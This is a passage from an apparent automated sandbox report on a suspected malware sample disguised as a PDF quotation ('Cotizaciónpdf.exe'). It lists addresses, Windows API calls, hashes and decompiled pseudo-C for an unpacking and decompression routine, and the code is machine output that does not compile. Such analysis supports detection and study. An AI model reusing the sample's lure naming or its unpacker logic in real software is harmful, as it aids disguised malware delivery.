						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

0x004053b5
0x004053b9
0x004053c2
0x004053c5
0x004053c8
0x004053d0
0x004053d2
0x004053d3
0x00000000
0x004053d3
0x004053e2
0x004053e2
0x004053e5
0x004053e8
0x004053fc
0x00405403
0x00405408
0x0040540a
0x0040541a
0x0040540c
0x00405412
0x00405412
0x0040541f
0x00405422
0x0040542d
0x00405433
0x00405438
0x00405448
0x0040544a
0x00405450
0x00405453
0x00405456
0x00405513
0x00405513
0x00405517
0x00405519
0x00405519
0x00405519
0x00405519
0x00000000
0x00000000
0x00000000
0x00000000
0x0040545c
0x0040545c
0x00405465
0x0040546b
0x00405470
0x00405473
0x00405475
0x00405479
0x0040547b
0x0040547b
0x00405479
0x0040547e
0x00405481
0x00405494
0x00405496
0x0040549b
0x004054a2
0x004054ba
0x004054c0
0x004054c6
0x004054c8
0x004054ed
0x004054ca
0x004054ca
0x004054ce
0x004054e2
0x004054d0
0x004054d3
0x004054d8
0x004054da
0x004054db
0x004054db
0x004054ce
0x004054a4
0x004054aa
0x004054ac
0x004054b2
0x004054b2
0x004054ac
0x00000000
0x004054a2
0x00405483
0x00405486
0x00405488
0x00000000
0x00000000
0x0040548a
0x0040548c
0x00000000
0x00000000
0x0040548e
0x00405492
0x00000000
0x00000000
0x00000000
0x004054f2
0x004054fc
0x00405502
0x00405502
0x0040550d
0x00000000
0x0040550d
0x00405424
0x0040542b
0x00000000
0x00000000
0x00000000
0x004053ea
0x004053ea
0x004053ec
0x0040551d
0x00405520
0x00405523
0x00405575
0x00405575
0x00405575
0x00405525
0x00405528
0x00405533
0x00405538
0x0040553a
0x00000000
0x00000000
0x0040553d
0x00405543
0x00405549
0x0040554f
0x00405551
0x00000000
0x0040556d
0x00405553
0x00405557
0x00000000
0x00000000
0x0040555c
0x00405561
0x00405562
0x00000000
0x00405563
0x0040552a
0x0040552a
0x00000000
0x0040552a
0x004053f2
0x004053f6
0x00000000
0x00000000
0x00000000
0x004053f6

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,7519F560), ref: 004053C8
lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,7519F560), ref: 00405412
lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,7519F560), ref: 00405433
lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,7519F560), ref: 00405439
FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" ,7519F560), ref: 0040544A
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
FindClose.KERNEL32(?), ref: 0040550D

Strings

\*.*, xrefs: 0040540C
C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
"C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" , xrefs: 004053B4

Memory Dump Source

Source File: 00000000.00000002.249477879.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.249468545.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249528355.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.249546103.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249678246.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249698500.0000000000429000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.249708597.000000000042C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Cotizaci#U00f3npdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Cotizaci#U00f3npdf.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-1444840069
Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
